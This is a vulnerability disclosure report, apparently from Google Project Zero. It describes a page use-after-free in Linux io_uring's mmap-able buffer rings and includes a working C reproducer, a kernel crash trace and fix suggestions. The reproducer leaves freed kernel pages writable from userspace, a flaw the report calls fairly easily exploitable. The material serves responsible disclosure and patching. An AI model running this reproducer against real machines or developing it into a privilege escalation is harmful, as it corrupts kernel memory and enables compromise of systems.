Linux >=6.4: io_uring: page UAF via buffer ring mmap
Since commit c56e022c0a27 (\"io_uring: add support for user mapped provided
buffer ring\"), landed in Linux 6.4, io_uring makes it possible to allocate,
mmap, and deallocate \"buffer rings\".
A \"buffer ring\" can be allocated with
io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated
with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...).
It can be mapped into userspace using mmap() with offset
IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM
subsystem will treat the mapping as a set of opaque page frame numbers not
associated with any corresponding pages; this implies that the calling code is
responsible for ensuring that the mapped memory can not be freed before the
userspace mapping is removed.
However, there is no mechanism to ensure this in io_uring: It is possible to
just register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then
free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving free
pages mapped into userspace, which is a fairly easily exploitable situation.
reproducer:
==============================================================
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/io_uring.h>
#define SYSCHK(x) ({ \\
typeof(x) __res = (x); \\
if (__res == (typeof(x))-1) \\
err(1, \"SYSCHK(\" #x \")\"); \\
__res; \\
})
int main(void) {
struct io_uring_params params = {
.flags = IORING_SETUP_NO_SQARRAY
};
int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, ¶ms));
printf(\"uring_fd = %d\
\", uring_fd);
struct io_uring_buf_reg reg = {
.ring_entries = 1,
.bgid = 0,
.flags = IOU_PBUF_RING_MMAP
};
SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, ®, 1));
void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));
printf(\"pbuf mapped at %p\
\", pbuf_mapping);
struct io_uring_buf_reg unreg = { .bgid = 0 };
SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));
while (1) {
memset(pbuf_mapping, 0xaa, 0x1000);
usleep(100000);
}
}
==============================================================
When run on a system with the debug options:
CONFIG_PAGE_TABLE_CHECK=y
CONFIG_PAGE_TABLE_CHECK_ENFORCED=y
, this will splat with the following error, when __page_table_check_zero()
detects that a page that's being freed is still mapped into userspace:
==============================================================
------------[ cut here ]------------
kernel BUG at mm/page_table_check.c:146!
invalid opcode: 0000 [#1] PREEMPT SMP KASAN
CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__page_table_check_zero+0x136/0x150
Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff
RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202
RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000
RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4
RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e
R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000
R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000
FS: 00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0
PKRU: 55555554
Call Trace:
<TASK>
[...]
free_unref_page_prepare+0x282/0x450
free_unref_page+0x45/0x170
__io_remove_buffers.part.0+0x38c/0x3c0
io_unregister_pbuf_ring+0x146/0x1e0
[...]
__do_sys_io_uring_register+0xa03/0x11c0
[...]
do_syscall_64+0x43/0xf0
entry_SYSCALL_64_after_hwframe+0x6e/0x76
RIP: 0033:0x7f745ef4bf59
Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48
RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59
RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003
RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000
R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0
R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000
</TASK>
Modules linked in:
---[ end trace 0000000000000000 ]---
==============================================================
When run on a system without those options, this reproducer will randomly
corrupt memory and probably on most runs crash the machine.
I tried it once and after I tried using some other programs, I got some random
kernel #GP fault.
One way to fix this might be to add some mapping counter to
`struct io_buffer_list`, and then:
- increment that counter in io_uring_validate_mmap_request() for PBUF_RING
mappings
- increment that counter in the vm_area_operations ->open() handler
- decrement that counter in the vm_area_operations ->close() handler
- refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?
Or alternatively free the io_buffer_list when the counter drops to zero, and let
the counter start at 1.
(I'm not sure what the lifetime rules for other accesses to the io_buffer_list's
memory are - it looks like most paths only access the io_buffer_list under some
lock? Is the idea that the kernel actually accesses the buffer through userspace
pointers, or something like that? I'll have to stare at this some more before I
understand it...)
This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-26.
Found by: jannh@google.com